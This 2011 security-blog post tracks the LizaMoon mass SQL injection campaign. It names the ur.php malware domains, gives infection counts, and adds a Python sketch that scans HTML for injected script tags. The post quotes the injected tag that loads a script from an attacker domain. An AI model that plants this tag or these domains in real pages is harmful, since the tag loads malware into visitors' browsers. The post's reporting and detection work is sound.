
Sucuri Blog

Website Security News


LizaMoon SQL injections (ur.php) – Now vcvsta.com, asweds.com, etc.

May 25, 2011 | David Dede


A couple of months ago, the LizaMoon malware / mass SQL injection was getting a lot of news coverage, with reports that it could be affecting hundreds of thousands of sites.

The media mostly forgot about it, but we kept tracking these attacks. They are continuing at full force, just under different domain names.

For example, the domain http://vcvsta.com/ur.php caused 1.5k sites to get blacklisted by Google:

Yes, this site has hosted malicious software over the past 90 days. It infected 1583 domain(s), including chamc.co.kr/, mugunghwa.or.kr/, humour.com/.

Meanwhile, http://statsl.com/ur.php caused more than 600 sites to get blacklisted, and searching Google for http://asweds.com/ur.php on ASP sites returns more than 2k pages.

Yes, this site has hosted malicious software over the past 90 days. It infected 622 domain(s), including rozanaspokesman.com/, 89fm.com.br/, phhc.co.kr/.

So what is going on? The attacks are still at full force, but they use different domain names to distribute the malware (always registered by jamesnorthone@hotmailbox.com). A hacked site will have the following code (or something very similar) added to its pages:

<script src=http://asweds.com/ur.php>..

These are some of the new domains used in this attack:

http://booksolo.com (showing up on hacked sites – seo spam)
http://bookvila.com (showing up on hacked sites – seo spam)
http://booktuba.com (showing up on hacked sites – seo spam)
http://bookavio.com (showing up on these hacked sites – seo spam)
http://booknunu.com (same as above)

And some of the old domains used for these mass SQL injections:


We posted more details on these types of attacks when the first one hit almost a year ago: Mass infection of IIS/ASP sites – robint.us

A good way to check if your site is infected is to use our malware scanner. If you see IIS:4 as the malware code, you know what happened.
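The injected tag shown earlier has a fixed shape (an external script whose path is /ur.php, usually with an unquoted src), so rendered pages or database text exports can also be checked locally. The sketch below is an added example, not Sucuri's scanner; the function name, the sample HTML and the host stats-example.invalid are constructed for illustration, and the known-host set holds only the three domains named in the text above.

```python
import re
from collections import Counter
from urllib.parse import urlsplit

# Domains quoted in the article's prose; extend from your own threat feed.
KNOWN_HOSTS = {"vcvsta.com", "asweds.com", "statsl.com"}
SUSPECT_PATH = "/ur.php"  # path shared by the injected URLs in the article
# <script ... src=VALUE> with quoted or unquoted VALUE, any letter case.
SCRIPT_SRC = re.compile(r"<script\b[^>]*?\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.I)

# Constructed sample page: two clean scripts plus three injected tags.
SAMPLE = """<html><head><title>News</title>
<script src="/js/site.js"></script>
<script type="text/javascript" src="https://cdn.example.net/lib.js"></script>
</head><body>
<h1>Spring sale<script src=http://asweds.com/ur.php></script></h1>
<p>Contact<SCRIPT SRC=http://stats-example.invalid/ur.php></SCRIPT></p>
<td>Item 4<script src=http://asweds.com/ur.php></script></td>
</body></html>"""

def find_injected_scripts(html, own_host):
    """Return sorted (host, reason, count) for external scripts that match
    a known domain or the /ur.php path on a host other than own_host."""
    hits = Counter()
    for src in SCRIPT_SRC.findall(html):
        if "//" not in src:          # relative URL: first-party script
            continue
        try:
            parts = urlsplit(src)
            host = (parts.hostname or "").lower()
        except ValueError:           # malformed netloc, nothing to compare
            continue
        host = host[4:] if host.startswith("www.") else host
        if not host or host == own_host.lower():
            continue
        if host in KNOWN_HOSTS:
            hits[(host, "known domain")] += 1
        elif parts.path.lower() == SUSPECT_PATH:
            # Same path on a host not in the set: likely a rotated domain.
            hits[(host, "ur.php on unlisted domain")] += 1
    return sorted((h, r, n) for (h, r), n in hits.items())

if __name__ == "__main__":
    for host, reason, count in find_injected_scripts(SAMPLE, "example.org"):
        print(f"{host}: {reason} ({count} tag(s))")
```

Because the attackers rotate domains, the path check matters more than the host set: a hit marked "ur.php on unlisted domain" is a candidate new domain to add to the set.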


If you have any questions or need help cleaning it up, let us know. If you need immediate clean up assistance, visit our Sign Up page.


Categories: Website Malware Infections
Tags: Hacked Websites, Malware Updates, Server Security, SQL Injection

About David Dede

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Comments

  1. Dan Cummings

    June 20, 2011

    Does anybody know why google keeps telling me that I still have this in my pictures when I know that I don’t?
